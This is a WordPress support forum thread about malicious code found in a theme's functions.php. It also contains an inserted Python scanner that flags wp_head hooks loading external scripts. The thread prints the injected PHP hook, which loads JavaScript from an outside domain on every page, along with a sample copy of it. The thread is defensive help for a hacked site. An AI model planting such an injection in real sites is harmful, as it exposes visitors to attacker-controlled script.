• mcprime

    (@mcprime)


    I recently checked the functions.php of the Hello Elementor theme and found that the very bottom contains this code.

    /**<js>*/function add_my_code() {
    echo '<script async src="https://billing.roofnrack.us/dh+V4w099ooSPa/RQSi5wQQ9r8EbPeg="></script>';
    }
    add_action('wp_head', 'add_my_code');/**<js>*/

    I checked the theme repository and they don’t have this kind of code. I don’t even know the URL put there. Can someone explain?

Viewing 3 replies - 1 through 3 (of 3 total)
  • r1k0

    (@r1k0)

    Hey @mcprime,

    It sounds like your site has been hacked. The code above injects an external JavaScript script into every page with the wp_head hook. The link is not related to Elementor or any other part of WordPress. Following the WordPress “My site was hacked” guide will help you recover your site.

    Additionally, if possible, contact your hosting provider to help you check the logs to determine when functions.php was last edited. Using a backup older than when the file was edited would be an easy and safe way to recover your site.

    Regards,
    Erick
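
A triage check for the pattern described in the reply above, as an added example that is not part of the thread and not code from WordPress or Elementor: it finds callbacks hooked to `wp_head` in a PHP file and reports any that echo a script tag loaded from an external host. The names `scan_php`, `function_body`, `allowed_hosts` and the sample host `loader.example.invalid` are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# add_action('wp_head', 'callback') registrations in PHP source.
HOOK_RE = re.compile(r"""add_action\(\s*['"]wp_head['"]\s*,\s*['"](\w+)['"]""")
# <script ... src="http(s)://host/..."> or protocol-relative //host/...
SCRIPT_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*\\?["']((?:https?:)?//[^"'\\]+)""", re.I)

def function_body(php, name):
    """Return the body of `function name(...) {...}` by brace counting, or ''.
    Braces inside PHP strings are not special-cased; good enough for triage."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", php)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(php) and depth:
        depth += {"{": 1, "}": -1}.get(php[i], 0)
        i += 1
    return php[m.end():i - 1]

def scan_php(php, allowed_hosts=frozenset()):
    """List (callback, host) for wp_head callbacks that emit an external script."""
    findings = []
    for callback in HOOK_RE.findall(php):
        for url in SCRIPT_RE.findall(function_body(php, callback)):
            host = urlparse(url).hostname or ""
            if host not in allowed_hosts:
                findings.append((callback, host))
    return findings

# Constructed sample: one injected loader shaped like the snippet in the thread
# (placeholder host), plus a harmless wp_head callback that must not be flagged.
SAMPLE = r"""<?php
function theme_meta() { echo '<meta name="viewport" content="width=device-width">'; }
add_action('wp_head', 'theme_meta');
/**<js>*/function add_my_code() {
echo '<script async src="https://loader.example.invalid/api/grab?url=x"></script>';
}
add_action('wp_head', 'add_my_code');/**<js>*/
"""

if __name__ == "__main__":
    for callback, host in scan_php(SAMPLE):
        print(f"wp_head callback {callback}() loads a script from {host}")
```

Pass the hosts the site legitimately loads scripts from as `allowed_hosts`; anything still reported in a theme's functions.php is worth comparing against the theme's published source.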

    Thread Starter mcprime

    (@mcprime)

    Hey @r1k0,

    Thanks a ton for the heads-up and the clear explanation!

    I’ll go through the WordPress hacked site guide and reach out to my hosting provider to check the logs — hopefully I can pinpoint when functions.php was edited. If I’ve got a clean backup from before that, I’ll restore it.

    Really appreciate you taking the time to help me out. 🙏

    Cheers

    • This reply was modified 8 months ago by mcprime.

    Hello @mcprime,
    You can still scan your website code with the gotmls plugin, which will help you get a detailed analysis of your WordPress files in your admin panel. I hope this will help you clear malware code from the entire WordPress directory.


The topic ‘Strange Code on Functions.php’ is closed to new replies.